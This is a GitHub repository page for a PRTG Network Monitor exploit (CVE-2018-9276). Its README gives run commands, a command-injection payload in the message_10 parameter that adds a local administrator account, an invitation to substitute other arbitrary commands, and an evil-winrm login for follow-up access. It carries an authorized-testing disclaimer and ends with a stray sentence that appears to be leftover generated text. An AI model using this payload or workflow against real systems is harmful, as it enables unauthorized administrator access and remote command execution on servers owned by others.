Skip to content

backglass/exploit_prtg

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
README_ES.md
README_ES.md
 
 
exploit_prtg.py
exploit_prtg.py
 
 
image.png
image.png
 
 

Repository files navigation

PRTG Exploit Script

This script is designed to exploit a vulnerability CVE-2018-9276 in PRTG Network Monitor, allowing you to add a user to the system and grant them administrator privileges. This script is intended for educational and authorized penetration testing purposes only. Do not use it on systems without explicit permission.

Requirements

  • Python 3.x
  • requests library (can be installed with pip install requests)

Usage

Clone the repository

git clone https://github.com/your_username/your_repository.git
cd your_repository

Running the script

The script is run from the command line and requires some arguments:

python exploit_prtg.py -u http://10.10.10.152 --user new_user --password "Password123!"

Arguments

  • -u or --url: The base URL of the PRTG server (e.g., http://10.10.10.152).
  • --user: The username you want to add to the system.
  • --password: The password for the user being added. It is recommended that the password be more than 9 characters long, including uppercase letters, numbers, and special characters.

Example

python exploit_prtg.py -u http://10.10.10.152 --user eviluserrrr --password "EvilUser1234!"

Important Notes

  • Username: PRTG may require the username to be at least 9 characters long.
  • Password: Make sure the password meets complexity requirements (uppercase letters, numbers, and special characters).

Vulnerability and Remote Code Execution (RCE)

This script exploits a vulnerability in the message_10 line of the POST request body. The vulnerability allows remote command execution because in this line you can inject arbitrary commands after the test.txt; text. For example, the script adds a new user and adds them to the administrators group in PRTG.

Injection Example

In the message_10 parameter, the script currently performs the following:

test.txt;net user {args.user} {args.password} /add;net localgroup Administrators {args.user} /add

You can modify this line to execute other arbitrary commands as needed.

Tips

To gain access to the system, it is recommended to use evil-winrm once the user has been added to the administrators group.

evil-winrm -i 10.10.10.152 -u eviluserrrr -p "EvilUser1234!"

Evil-WinRM

Warning

This script and the information provided here are for educational purposes and security testing in controlled environments with explicit permission only. Do not use it on systems you do not have authorization for, as doing so could be illegal.

Author

[backglass]
Thanks to https://codewtch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/ for the information on the vulnerability.

This README.md now clearly explains the remote code execution (RCE) vulnerability and how the message_10 line can be used to execute arbitrary commands. It also includes examples of how to use the script and exploit the vulnerability to gain access to the system.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages